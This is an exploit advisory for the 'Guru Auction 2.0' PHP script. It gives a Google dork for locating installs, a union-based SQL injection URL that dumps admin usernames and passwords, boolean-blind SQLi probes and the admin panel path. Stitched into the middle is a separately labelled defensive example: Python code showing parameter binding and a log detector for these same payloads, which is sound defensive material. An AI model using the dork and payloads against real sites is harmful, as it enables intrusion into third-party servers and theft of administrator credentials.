Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
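Both proofs of concept above work because the `cate_id` and `item_id` parameters are spliced into SQL as text. The block below is an added example, not code from the advisory or from the Guru Auction product: it shows the defensive pattern for such an integer-keyed lookup (strict allow-list on the parameter, then a bound query parameter) and a small detector that flags the union-based and boolean-blind request shapes shown above in web server access logs. Python with an in-memory SQLite database stands in for the PHP/MySQL application; the table and column names, the log format and the log lines are all constructed for the example.

```python
# Added example (not from the advisory or the Guru Auction code base).
# Assumed/constructed: table and column names, the access-log format, and
# every log line below.
import re
import sqlite3
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for the auction database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subcategory (cate_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE admin (user_name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO subcategory VALUES (?, ?)",
        [(1, "Antiques"), (2, "Electronics"), (575, "Coins")],
    )
    conn.execute("INSERT INTO admin VALUES ('admin', 'placeholder-hash')")
    conn.commit()
    return conn


def is_well_formed_id(raw: str) -> bool:
    """Allow-list check: an id must be a plain positive integer with no
    surrounding operators, spaces or comment markers."""
    return re.fullmatch(r"[1-9][0-9]{0,9}", raw) is not None


def lookup_subcategory(conn: sqlite3.Connection, raw_cate_id: str) -> Optional[str]:
    """Hardened counterpart of subcat.php?cate_id=: reject anything that is
    not a bare integer, then bind the value as a query parameter so it can
    never change the SQL text."""
    if not is_well_formed_id(raw_cate_id):
        raise ValueError(f"invalid cate_id: {raw_cate_id!r}")
    row = conn.execute(
        "SELECT name FROM subcategory WHERE cate_id = ?", (int(raw_cate_id),)
    ).fetchone()
    return row[0] if row else None


# Detection side: inspect the cate_id / item_id value of each logged request.
_ID_PARAM = re.compile(r"[?&](?:cate_id|item_id)=([^&\s]*)", re.IGNORECASE)
_UNION = re.compile(r"union\W+(?:all\W+)?select", re.IGNORECASE)
_BOOL = re.compile(r"\b(?:and|or)\W+.*(?:substring|@@version|=)", re.IGNORECASE)


def classify_request(request_line: str) -> Optional[str]:
    """Return 'union', 'boolean-blind', 'suspicious', or None (benign/no id)."""
    m = _ID_PARAM.search(request_line)
    if not m:
        return None
    decoded = unquote_plus(m.group(1))  # '+' and %xx become plain characters
    if re.fullmatch(r"[0-9]+", decoded):
        return None
    if _UNION.search(decoded):
        return "union"
    if _BOOL.search(decoded):
        return "boolean-blind"
    return "suspicious"


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Pair each flagged log line with its classification."""
    hits = []
    for line in lines:
        label = classify_request(line)
        if label:
            hits.append((label, line))
    return hits


# Constructed sample log lines (not from any real server); the last two
# differ sharply in response size, which is the signal a boolean-blind
# probe relies on and a useful secondary indicator when reviewing logs.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/subcat.php?cate_id=2 HTTP/1.1" 200 1843',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 912',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 410',
]

if __name__ == "__main__":
    db = build_demo_db()
    print("cate_id=2 ->", lookup_subcategory(db, "2"))
    for label, line in scan_log(SAMPLE_LOG):
        print(label, "|", line.split('"')[1])
```

The allow-list check is the cheap first line of defence for integer keys, but the parameter binding is what actually closes the hole; keep both, since the binding still protects if a later change loosens the validation. The detector is intentionally narrow (it only looks at the two parameters named in the advisory), which keeps false positives low when triaging logs for this specific product.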

Admin login portal:
~~~~~~~~~~
http://domain.tld/[path]/admin/